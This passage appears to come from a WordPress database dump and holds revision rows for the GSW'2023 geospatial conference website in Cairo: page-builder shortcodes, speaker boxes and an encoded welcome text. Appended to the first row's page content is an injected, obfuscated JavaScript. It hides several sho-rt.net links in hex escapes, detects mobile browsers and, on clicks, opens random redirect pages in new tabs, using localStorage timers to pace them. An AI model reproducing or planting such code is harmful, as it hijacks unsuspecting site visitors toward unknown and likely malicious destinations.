Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665117715892{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023 By\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" margin_design_tab_text=\"\"][/ultimate_heading][dt_team_masonry img_border_radius=\"0px\" bwb_columns=\"desktop:2|h_tablet:2|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-07 13:14:05','2022-10-07 13:14:05','',2167,'https://gsw2023.com/?p=2393',0,'revision','',0),
(2394,1,'2022-10-07 13:21:26','2022-10-07 13:21:26','[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]\r\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\r\n[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]\r\n<h6>Geospatial Week Director ,The University of Calgary</h6>\r\n[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWw